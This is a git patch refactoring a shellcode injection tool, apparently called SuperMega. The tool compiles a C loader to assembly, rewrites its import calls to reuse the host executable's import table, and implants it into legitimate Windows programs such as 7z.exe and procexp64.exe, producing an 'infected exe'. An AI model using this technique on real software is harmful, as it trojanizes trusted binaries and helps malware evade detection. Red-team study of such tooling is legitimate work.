From ca8e830ec668641e90e35cd11baa30c3d9e1d00b Mon Sep 17 00:00:00 2001 From: Dobin Date: Fri, 16 Feb 2024 15:26:56 +0000 Subject: [PATCH] refactor: make IAT_REUSE check work well --- model.py | 60 +++++++++++++++------------------- pehelper.py | 7 ---- phases/compiler.py | 80 +++++++++++++++++++++++++++++++--------------- phases/injector.py | 44 ++++++++++++------------- project.py | 8 +++-- supermega.py | 72 ++++++++++++++++++++++++----------------- 6 files changed, 149 insertions(+), 122 deletions(-) diff --git a/model.py b/model.py index 017a7e1..a08dfaa 100644 --- a/model.py +++ b/model.py @@ -7,14 +7,14 @@ import pehelper logger = logging.getLogger("Model") -class Capability(): - def __init__(self, name): - self.name = name - self.id: bytes = b"" - self.addr: int = 0 +class IatResolve(): + def __init__(self, name: str, placeholder: bytes, addr: int): + self.name: str = name # Function Name, like "VirtualAlloc" + self.id: bytes = placeholder # Random bytes + self.addr: int = addr # The address of the IAT entry (incl. image_base) - def __str__(self): + def __str__(self) -> str: return "0x{:X}: {} ({})".format( self.addr, self.name, @@ -23,8 +23,8 @@ class Capability(): class ExeInfo(): - def __init__(self, capabilities): - self.capabilities: Dict[str, Capability] = {} + def __init__(self): + self.iat_resolves: Dict[str, IatResolve] = {} self.image_base = 0 self.dynamic_base = False @@ -36,8 +36,10 @@ class ExeInfo(): self.base_relocs = [] self.rwx_section = None - for cap in capabilities: - self.capabilities[cap] = Capability(cap) + + def add_capability(self, func_name, placeholder): + self.iat_resolves[func_name] = IatResolve( + func_name, placeholder, pehelper.get_addr_for(self.iat, func_name)) def parse_from_exe(self, filepath): @@ -61,10 +63,7 @@ class ExeInfo(): self.code_rawsize = self.code_section.SizeOfRawData # iat - iat = pehelper.extract_iat(pe) - for _, cap in self.capabilities.items(): - cap.addr = pehelper.get_addr_for(iat, cap.name) - self.iat = iat + self.iat = pehelper.extract_iat(pe) # relocs if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'): @@ -81,32 +80,23 @@ class ExeInfo(): self.rwx_section = pehelper.get_rwx_section(pe) - def get(self, func_name): - if not func_name in self.capabilities: - return None - if self.capabilities[func_name].addr == 0: - return None - - return self.capabilities[func_name] + def get_all_iat_resolvs(self) -> Dict[str, IatResolve]: + return self.iat_resolves - - def get_all(self) -> Dict[str, Capability]: - return self.capabilities - - def has_all(self): - needs = [ 'GetEnvironmentVariableW', 'VirtualAlloc'] - for need in needs: - if not need in self.capabilities: - return False - if self.capabilities[need].addr == 0: - return False - return True + def has_all_functions(self, needs): + is_ok = True + for func_name in needs: + addr = pehelper.get_addr_for(self.iat, func_name) + if addr == 0: + logging.warn("Not available as import: {}".format(func_name)) + is_ok = False + return is_ok def print(self): - logger.info("--( Capabilities: ") - for _, cap in self.capabilities.items(): + logger.info("--( Required IAT Resolves: ") + for _, cap in self.iat_resolves.items(): if cap.addr == 0: logger.info(" {:28} {}".format(cap.name, "N/A")) else: diff --git a/pehelper.py b/pehelper.py index d744c11..642017f 100644 --- a/pehelper.py +++ b/pehelper.py @@ -113,13 +113,6 @@ def get_addr_for(iat, func_name: str) -> int: return 0 -def resolve_iat_capabilities(needed_capabilities, inject_exe): - pe = pefile.PE(inject_exe) - iat = extract_iat(pe) - for _, cap in needed_capabilities.items(): - cap.addr = get_addr_for(iat, cap.name) - - ## Utils def remove_trailing_null_bytes(data: bytes) -> bytes: diff --git a/phases/compiler.py b/phases/compiler.py index 44ef116..f1bb1f7 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -20,7 +20,7 @@ def compile( ): logger.info("--[ Compile C to ASM: {} -> {} ".format(c_in, asm_out)) - # Phase 1: C To Assembly + # Compile C To Assembly (text) logger.info("---[ Make ASM from C: {} ".format(c_in)) run_process_checkret([ config.get("path_cl"), @@ -34,13 +34,13 @@ def compile( raise Exception("Error: Compiling failed") observer.add_text("payload_asm_orig", file_readall_text(asm_out)) - # Phase 1.2: Assembly fixup + # Assembly text fixup (SuperMega) logger.info("---[ Fixup : {} ".format(asm_out)) if not fixup_asm_file(asm_out, payload_len, exe_info): raise Exception("Error: Fixup failed") observer.add_text("payload_asm_fixup", file_readall_text(asm_out)) - # Phase 1.1: Assembly cleanup + # Assembly cleanup (masm_shc) asm_clean_file = asm_out + ".clean" logger.info("---[ Cleanup: {} ".format(asm_out)) run_process_checkret([ @@ -51,6 +51,7 @@ def compile( if not os.path.isfile(asm_clean_file): raise Exception("Error: Cleanup filed") + # Move to destination we expect shutil.move(asm_clean_file, asm_out) observer.add_text("payload_asm_cleanup", file_readall_text(asm_out)) @@ -63,7 +64,7 @@ def bytes_to_asm_db(byte_data: bytes) -> bytes: return "\tDB " + formatted_string -def fixup_asm_file(filename: FilePath, payload_len: int, capabilities: ExeInfo): +def fixup_asm_file(filename: FilePath, payload_len: int, exe_info: ExeInfo): with open(filename, 'r', encoding='utf-8') as asmfile: lines = asmfile.readlines() @@ -72,27 +73,6 @@ def fixup_asm_file(filename: FilePath, payload_len: int, capabilities: ExeInfo): # if "jmp\tSHORT" in lines[idx]: # lines[idx] = lines[idx].replace("SHORT", "") - # do IAT reuse - for idx, line in enumerate(lines): - # Remove EXTRN, we dont need it - if "EXTRN __imp_" in lines[idx]: - lines[idx] = "; " + lines[idx] - continue - - # Fix call - if "call" in lines[idx] and "__imp_" in lines[idx]: - func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip() - exeCapability = capabilities.get(func_name) - if exeCapability == None: - logger.error("Error Capabilities not: {}".format(func_name)) - else: - randbytes: bytes = os.urandom(6) - lines[idx] = bytes_to_asm_db(randbytes) + "\r\n" - exeCapability.id = randbytes - - logger.info(" > Replace func name: {} with {}".format( - func_name, randbytes)) - # replace external reference with shellcode reference for idx, line in enumerate(lines): if "supermega_payload" in lines[idx]: @@ -128,4 +108,52 @@ def fixup_asm_file(filename: FilePath, payload_len: int, capabilities: ExeInfo): with open(filename, 'w') as asmfile: asmfile.writelines(lines) - return True \ No newline at end of file + return True + + +def get_function_stubs(asm_in: FilePath): + functions = [] + + with open(asm_in, 'r', encoding='utf-8') as asmfile: + lines = asmfile.readlines() + + # EXTRN __imp_GetEnvironmentVariableW:PROC + for line in lines: + if "EXTRN __imp_" in line: + a = line + a = a.split("__imp_")[1] + a = a.split(":PROC")[0] + func_name = a + #func_name = line.strip("\r\n ") + #func_name = line.replace("EXTRN\t__imp_", "") + #func_name = line.replace(":PROC", "") + functions.append(func_name) + + return functions + + +def fixup_iat_reuse(filename: FilePath, exe_info): + with open(filename, 'r', encoding='utf-8') as asmfile: + lines = asmfile.readlines() + + # do IAT reuse + for idx, line in enumerate(lines): + # Remove EXTRN, we dont need it + if "EXTRN __imp_" in lines[idx]: + lines[idx] = "; " + lines[idx] + continue + + # Fix call + # call QWORD PTR __imp_GetEnvironmentVariableW + if "call" in lines[idx] and "__imp_" in lines[idx]: + func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip() + + randbytes: bytes = os.urandom(6) + lines[idx] = bytes_to_asm_db(randbytes) + "\r\n" + exe_info.add_capability(func_name, randbytes) + + logger.info(" > Replace func name: {} with {}".format( + func_name, randbytes)) + + with open(filename, 'w') as asmfile: + asmfile.writelines(lines) \ No newline at end of file diff --git a/phases/injector.py b/phases/injector.py index 7c55fa3..915fd51 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -14,7 +14,6 @@ def inject_exe( shellcode_in: FilePath, exe_in: FilePath, exe_out: FilePath, - exe_info: ExeInfo, ): logger.info("--[ Injecting: {} into: {} -> {} ".format( shellcode_in, exe_in, exe_out @@ -33,28 +32,29 @@ def inject_exe( exe_out ]) - # replace IAT in shellcode in code - # and re-implant it - if project.source_style == SourceStyle.iat_reuse: - # get code section of exe_out - code = extract_code_from_exe(exe_out) - for cap in exe_info.get_all().values(): - if not cap.id in code: - raise Exception("Capability ID {} not found, abort".format(cap.id)) - - off = code.index(cap.id) - current_address = off + exe_info.image_base + exe_info.code_virtaddr - destination_address = cap.addr - logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( - current_address, destination_address - )) - jmp = assemble_and_disassemble_jump( - current_address, destination_address - ) - code = code.replace(cap.id, jmp) - # write back our patched code into the exe - write_code_section(exe_file=exe_out, new_data=code) +def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo): + """replace IAT in shellcode in code and re-implant it""" + + # get code section of exe_out + code = extract_code_from_exe(exe_out) + for cap in exe_info.get_all_iat_resolvs().values(): + if not cap.id in code: + raise Exception("IatResolve ID {} not found, abort".format(cap.id)) + + off = code.index(cap.id) + current_address = off + exe_info.image_base + exe_info.code_virtaddr + destination_address = cap.addr + logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( + current_address, destination_address + )) + jmp = assemble_and_disassemble_jump( + current_address, destination_address + ) + code = code.replace(cap.id, jmp) + + # write back our patched code into the exe + write_code_section(exe_file=exe_out, new_data=code) def verify_injected_exe(exefile: FilePath) -> int: diff --git a/project.py b/project.py index 7b59ab6..e99f49e 100644 --- a/project.py +++ b/project.py @@ -39,13 +39,15 @@ class Project(): def load_payload(self): + logging.info("Load payload: {}".format(self.payload_path)) with open(self.payload_path, 'rb') as input2: self.payload_data = input2.read() - def load_injectable(self, tmp_caps): - self.exe_info = ExeInfo(tmp_caps) + def load_injectable(self): + logging.info("Load injectable: {}".format(self.inject_exe_in)) + self.exe_info = ExeInfo() self.exe_info.parse_from_exe(self.inject_exe_in) - + project = Project() diff --git a/supermega.py b/supermega.py index 39687bd..20ed08f 100644 --- a/supermega.py +++ b/supermega.py @@ -81,23 +81,20 @@ def main(): project.try_start_final_shellcode = False if args.verify == "peb": - project.source_style = SourceStyle.peb_walk + project.inject = True + project.inject_mode = "1,1" + project.inject_exe_in = "exes/7z.exe" + project.inject_exe_out = "out/7z-verify.exe" + elif args.verify == "iat": project.inject = True project.inject_mode = "1,1" project.inject_exe_in = "exes/procexp64.exe" - project.inject_exe_out = "out/procexp64-a.exe" - elif args.verify == "iat": - project.source_style = SourceStyle.iat_reuse - project.inject = True - project.inject_mode = "1,1" - project.inject_exe_in = "exes/iattest-full.exe" - project.inject_exe_out = "out/iatttest-full-a.exe" + project.inject_exe_out = "out/procexp64-verify.exe" elif args.verify == "rwx": - project.source_style = SourceStyle.peb_walk project.inject = True project.inject_mode = "1,1" project.inject_exe_in = "exes/wifiinfoview.exe" - project.inject_exe_out = "out/wifiinfoview.exe-a.exe" + project.inject_exe_out = "out/wifiinfoview.exe-verify.exe" else: logger.info("Unknown verify option {}, use std/iat".format(args.verify)) @@ -139,35 +136,50 @@ def start(): # Load our input project.load_payload() - project.load_injectable([ - "GetEnvironmentVariableW", - "VirtualAlloc" - ]) - project.exe_info.print() + project.load_injectable() - # choose which source / technique we gonna use - if project.exe_info.has_all(): - project.source_style = SourceStyle.iat_reuse - else: - logger.info("--[ Some imports are missing for the shellcode to use IAT_REUSE") - project.source_style = SourceStyle.peb_walk - logger.warning("--[ SourceStyle: {}".format(project.source_style.name)) - - # Copy: loader C files into working directory: build/ + # Copy: IAT_REUSE loader C files into working directory: build/ phases.templater.create_c_from_template( - source_style = project.source_style, + source_style = SourceStyle.iat_reuse, alloc_style = project.alloc_style, exec_style = project.exec_style, decoder_style= project.decoder_style, ) - - # Compile: C -> ASM + # Compile: IAT_REUSE loader C -> ASM if project.generate_asm_from_c: phases.compiler.compile( c_in = main_c_file, asm_out = main_asm_file, payload_len = len(project.payload_data), exe_info = project.exe_info) + + # Decide if we can use IAT_REUSE (all function calls available as import) + required_functions = phases.compiler.get_function_stubs(main_asm_file) + if project.exe_info.has_all_functions(required_functions): + project.source_style = SourceStyle.iat_reuse + logger.warning("--[ SourceStyle: Using IAT_REUSE".format()) + # all good, patch ASM + phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_info) + else: + # Not good, Fall back to PEB_WALK + project.source_style = SourceStyle.peb_walk + logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format()) + + clean_files() + # Copy: PEB_WALK loader C files into working directory: build/ + phases.templater.create_c_from_template( + source_style = SourceStyle.peb_walk, + alloc_style = project.alloc_style, + exec_style = project.exec_style, + decoder_style= project.decoder_style, + ) + # Compile: PEB_WALK C -> ASM + if project.generate_asm_from_c: + phases.compiler.compile( + c_in = main_c_file, + asm_out = main_asm_file, + payload_len = len(project.payload_data), + exe_info = project.exe_info) # Assemble: ASM -> Shellcode if project.generate_shc_from_asm: @@ -216,9 +228,11 @@ def start(): phases.injector.inject_exe( shellcode_in = main_shc_file, exe_in = project.inject_exe_in, - exe_out = project.inject_exe_out, - exe_info = project.exe_info + exe_out = project.inject_exe_out ) + if project.source_style == SourceStyle.iat_reuse: + phases.injector.injected_fix_iat(project.inject_exe_out, project.exe_info) + if project.verify: logger.info("--[ Verify infected exe") exit_code = phases.injector.verify_injected_exe(project.inject_exe_out)